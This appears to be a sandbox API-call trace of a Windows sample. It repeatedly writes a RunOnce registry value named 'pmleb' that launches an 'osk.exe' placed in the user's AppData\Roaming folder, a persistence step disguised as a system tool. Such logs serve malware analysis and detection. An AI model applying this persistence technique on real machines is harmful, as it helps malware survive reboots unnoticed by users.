[0098.895] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.895] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.895] SetTimer (hWnd=0x20280, nIDEvent=0x22fe, uElapse=0xa, lpTimerFunc=0x0) returned 0x22fe [0098.895] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.909] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.909] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.910] KillTimer (hWnd=0x20280, uIDEvent=0x22fe) returned 1 [0098.910] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.910] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.910] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.910] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.911] RegCloseKey (hKey=0x280) returned 0x0 [0098.911] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.911] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.911] SetTimer (hWnd=0x20280, nIDEvent=0x22ff, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ff [0098.911] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.926] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.926] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.926] KillTimer (hWnd=0x20280, uIDEvent=0x22ff) returned 1 [0098.926] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.926] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.927] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.927] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.927] RegCloseKey (hKey=0x280) returned 0x0 [0098.927] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.927] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.927] SetTimer (hWnd=0x20280, nIDEvent=0x2300, uElapse=0xa, lpTimerFunc=0x0) returned 0x2300 [0098.927] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.941] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.941] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.941] KillTimer (hWnd=0x20280, uIDEvent=0x2300) returned 1 [0098.941] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.942] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.942] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.942] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.942] RegCloseKey (hKey=0x280) returned 0x0 [0098.942] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.942] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.942] SetTimer (hWnd=0x20280, nIDEvent=0x2301, uElapse=0xa, lpTimerFunc=0x0) returned 0x2301 [0098.942] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.957] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.957] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.957] KillTimer (hWnd=0x20280, uIDEvent=0x2301) returned 1 [0098.957] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.958] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.958] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.958] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.958] RegCloseKey (hKey=0x280) returned 0x0 [0098.958] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.958] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.958] SetTimer (hWnd=0x20280, nIDEvent=0x2302, uElapse=0xa, lpTimerFunc=0x0) returned 0x2302 [0098.959] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.972] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.972] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.972] KillTimer (hWnd=0x20280, uIDEvent=0x2302) returned 1 [0098.973] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.973] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.973] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.973] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.974] RegCloseKey (hKey=0x280) returned 0x0 [0098.974] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.974] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.974] SetTimer (hWnd=0x20280, nIDEvent=0x2303, uElapse=0xa, lpTimerFunc=0x0) returned 0x2303 [0098.974] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.994] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.994] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.995] KillTimer (hWnd=0x20280, uIDEvent=0x2303) returned 1 [0098.995] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.995] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.995] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.995] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.996] RegCloseKey (hKey=0x280) returned 0x0 [0098.996] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.996] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0098.996] SetTimer (hWnd=0x20280, nIDEvent=0x2304, uElapse=0xa, lpTimerFunc=0x0) returned 0x2304 [0098.996] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.003] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.003] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.004] KillTimer (hWnd=0x20280, uIDEvent=0x2304) returned 1 [0099.005] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.007] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.007] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.008] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.008] RegCloseKey (hKey=0x280) returned 0x0 [0099.008] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.008] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.009] SetTimer (hWnd=0x20280, nIDEvent=0x2305, uElapse=0xa, lpTimerFunc=0x0) returned 0x2305 [0099.009] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.021] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.021] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.021] KillTimer (hWnd=0x20280, uIDEvent=0x2305) returned 1 [0099.042] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.042] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.042] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.043] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.043] RegCloseKey (hKey=0x280) returned 0x0 [0099.043] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.043] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.043] SetTimer (hWnd=0x20280, nIDEvent=0x2306, uElapse=0xa, lpTimerFunc=0x0) returned 0x2306 [0099.043] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.058] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.058] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.058] KillTimer (hWnd=0x20280, uIDEvent=0x2306) returned 1 [0099.059] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.059] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.059] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.059] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.060] RegCloseKey (hKey=0x280) returned 0x0 [0099.060] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.060] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.060] SetTimer (hWnd=0x20280, nIDEvent=0x2307, uElapse=0xa, lpTimerFunc=0x0) returned 0x2307 
[0099.060] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.065] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.066] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.066] KillTimer (hWnd=0x20280, uIDEvent=0x2307) returned 1 [0099.066] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.066] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.066] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.067] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.067] RegCloseKey (hKey=0x280) returned 0x0 [0099.067] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.067] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.067] SetTimer (hWnd=0x20280, nIDEvent=0x2308, uElapse=0xa, lpTimerFunc=0x0) returned 0x2308 [0099.067] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.081] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.081] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.082] KillTimer (hWnd=0x20280, uIDEvent=0x2308) returned 1 [0099.083] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.083] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.083] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.083] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.083] RegCloseKey (hKey=0x280) returned 0x0 [0099.083] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.084] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.084] SetTimer (hWnd=0x20280, nIDEvent=0x2309, uElapse=0xa, lpTimerFunc=0x0) returned 0x2309 [0099.084] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.097] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.097] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.097] KillTimer (hWnd=0x20280, uIDEvent=0x2309) returned 1 [0099.097] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.098] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.098] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.098] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.098] RegCloseKey (hKey=0x280) returned 0x0 [0099.098] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.098] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.098] SetTimer (hWnd=0x20280, nIDEvent=0x230a, uElapse=0xa, lpTimerFunc=0x0) returned 0x230a [0099.098] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0099.112] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.112] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.113] KillTimer (hWnd=0x20280, uIDEvent=0x230a) returned 1 [0099.113] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.113] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.113] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.114] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.115] RegCloseKey (hKey=0x280) returned 0x0 [0099.115] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.115] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.115] SetTimer (hWnd=0x20280, nIDEvent=0x230b, uElapse=0xa, lpTimerFunc=0x0) returned 0x230b [0099.115] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.128] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.128] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.128] KillTimer (hWnd=0x20280, uIDEvent=0x230b) returned 1 [0099.128] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.129] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.129] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.129] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.129] RegCloseKey (hKey=0x280) returned 0x0 [0099.129] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.129] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.129] SetTimer (hWnd=0x20280, nIDEvent=0x230c, uElapse=0xa, lpTimerFunc=0x0) returned 0x230c [0099.129] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.143] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.143] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.144] KillTimer (hWnd=0x20280, uIDEvent=0x230c) returned 1 [0099.144] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.144] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.145] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.145] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.145] RegCloseKey (hKey=0x280) returned 0x0 [0099.145] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.145] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.145] SetTimer (hWnd=0x20280, nIDEvent=0x230d, uElapse=0xa, lpTimerFunc=0x0) returned 0x230d [0099.145] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.160] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.160] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.160] KillTimer (hWnd=0x20280, uIDEvent=0x230d) returned 1 [0099.160] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.161] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.161] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.161] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.161] RegCloseKey (hKey=0x280) returned 0x0 [0099.161] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.161] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.161] SetTimer (hWnd=0x20280, nIDEvent=0x230e, uElapse=0xa, lpTimerFunc=0x0) returned 0x230e [0099.161] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.175] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.175] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.175] KillTimer (hWnd=0x20280, uIDEvent=0x230e) returned 1 [0099.175] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.176] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.176] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.176] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.176] RegCloseKey (hKey=0x280) returned 0x0 [0099.176] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.177] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.177] SetTimer (hWnd=0x20280, nIDEvent=0x230f, uElapse=0xa, lpTimerFunc=0x0) returned 0x230f [0099.177] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.190] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.190] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.190] KillTimer (hWnd=0x20280, uIDEvent=0x230f) returned 1 [0099.191] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.191] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.191] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.191] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.192] RegCloseKey (hKey=0x280) returned 0x0 [0099.192] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.192] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.192] SetTimer (hWnd=0x20280, nIDEvent=0x2310, uElapse=0xa, lpTimerFunc=0x0) returned 0x2310 [0099.192] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.206] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.206] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.206] KillTimer (hWnd=0x20280, 
